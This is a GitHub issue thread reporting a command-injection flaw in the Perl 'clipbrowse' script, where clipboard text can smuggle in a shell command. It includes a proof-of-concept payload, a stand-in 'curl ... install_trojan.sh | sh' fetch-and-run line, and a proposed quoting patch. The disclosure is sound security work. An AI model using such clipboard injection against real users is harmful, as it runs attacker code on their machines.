### ISSUE TITLE
clipbrowse command execution with multi-line clipboard text including | sh

### ISSUE THREAD

**Issue by sgiebels** [shlomif/Clipboard#11]
Running 'clipbrowse' with the following clipboard contents:
```
https://www.example.com
echo echo p0wned | sh
```
results in the browser opening the requested URL in the foreground, while simultaneous running the specified command in the background.
Testen on Debian 12, Perl 5.36.0-7+deb12u1, libclipboard-perl 0.27-1
This example might just print 'p0wned', but because you are copying this piece of text using a browser that understands JavaScript, and JavaScript can modify the clipboard contents, I could just as well have you execute  "curl https://evilhacker.example.com/install_trojan.sh | sh"  by changing the clipboard contents.

This can be abused by just including the 'clipbrowse' command as an instruction in an online tutorial, while having modified the users clipboard contents using JavaScript.

I was redirected to here from https://rt.cpan.org/Public/Bug/Report.html?Queue=Clipboard  
If this is not the correct place to report/post this, please tell me. 

Thank you for your time and attention.

**Comment by sgiebels** [comment]
This looks to be a Debian issue, closing.

**Comment by fschlich** [comment]
I can confirm that this issue was introduced in the default setup by a Debian-specific patch. However the upstream clipbrowse script is affected by the same problem if the user has set the `BROWSER` environment variable to a value that does not include `%s`, in which case it will be appended unquoted. I suggest adding the quotes as follows:
```
--- a/scripts/clipbrowse
+++ b/scripts/clipbrowse
@@ -5,7 +5,7 @@ use strict;
 use warnings;
 use Clipboard;
 my $browser = $ENV{BROWSER} || 'chromium-browser "%s"';
-$browser .= ' %s' unless $browser =~ /%s/;
+$browser .= ' "%s"' unless $browser =~ /%s/;
 my $query = Clipboard->paste;
 $query =~ s/['"]/\\$&/;
 system(sprintf $browser, $query);
 ```
